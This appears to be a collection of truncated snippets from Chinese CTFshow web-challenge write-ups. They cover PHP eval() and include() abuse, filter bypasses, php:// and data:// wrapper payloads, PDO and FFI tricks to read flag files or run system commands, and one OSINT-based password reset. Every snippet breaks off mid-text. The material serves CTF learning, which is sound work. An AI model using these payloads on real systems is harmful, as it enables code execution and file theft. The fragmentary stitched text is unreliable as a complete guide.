web74:eval() 利用,正则绕过。 web75:eval() 利用,正则绕过,PDO 利用。 web76:eval() 利用,正则绕过,PDO 利用。 web77:eval() 利用,正则绕过,伪协议glob://,FFI 利用。 web78:include() 利用,伪协议php://。 web79:include() 利用,伪协议data://。 web80:include() 利用,一句话木马之 Nginx 日志...
php7.4版本以上才有$ffi=FFI::cdef("int system(const char *command);");//创建一个system对象$a='/readflag > 1.txt';//没有回显的$ffi->system($a);//通过$ffi去调用system函数 5.web118 是使用system函数执行 echo ${PWD} /root echo ${PWD:0:1} 表示从0下标开始的第一个字符 / / echo ...
Web42: 过滤如下:/dev/null:将输出的所有数据输入进一个不保存的临时文件(无回显)[黑洞文件] 2>&1:将错误输出重定向指向标准输出,一并输入进临时文件 使用;或者%09分隔为两条命令,将后一条命令执行结果输入黑洞文件。payload:c=tac flag.php; ...
web75-通过pdo类开启数据库链接来突破函数限制读取文件c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');foreach($dbh->query('select load_file("/flag36.txt")') as $row){echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo$e>get...
WEB15:首页找到qq邮箱。根据提示访问/admin/(也可以用dirsearch扫,线程不能开太多),发现是一个后台登录界面。登录admin,提示密码错误,进入忘记密码,发现问题是所在地。根据拿到的qq邮箱在qq里搜索qq号,可以看到号主所在地。填入后提示重置密码,用密码登录admin拿到flag。
ctfshow web入门文件包含 回到顶部 文件包含 web78 if(isset($_GET['file'])){$file=$_GET['file'];include($file); }else{highlight_file(__FILE__); } 用PHP伪协议php://filter来构造 源码中的include函数,这个表示从外部引入php文件并执行,如果执行不成功,就返回文件的源码。 这是一个file关键字的...
CTFSHOW(WEB) web入门 给她1 参考文档 https://blog.csdn.net/weixin_51412071/article/details/124270277 查看链接 sql注入 复制代码 1 2 3 4 5 <?php$pass=sprintf("and pass='%s'",addslashes($_GET['pass']));$sql=sprintf("select * from user where name='%s'$pass",addslashes($_GET['name'...
CTFShow-Web入门-命令执行 71-74 web71 payload:c=include("/flag.txt");exit(); 执行完前面的包含语句后会强制退出,不会执行后面的语句 web72 error_reporting(0);ini_set('display_errors', 0);//你们在炫技吗?if(isset($_POST['c'])){$c=$_POST['c'];eval($c);$s=ob_get_contents();ob...
Ctfshow Web入门 - 文件包含总结 普通文件包含 常见的php伪协议大致四种 1.php://filter 主要用于读取源码2.php://input 经常使用file_get_contents获取php://input内容3.data://执行命令4.file://访问本地文件系统 Web78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php...
web 32过滤了: flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\( 这里考虑:利用文件包含以及伪协议读取?c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php这里伪协议的意思是,php://filter(过滤器)/convert.base64-encode(base64编码的过滤器)/resource=flag....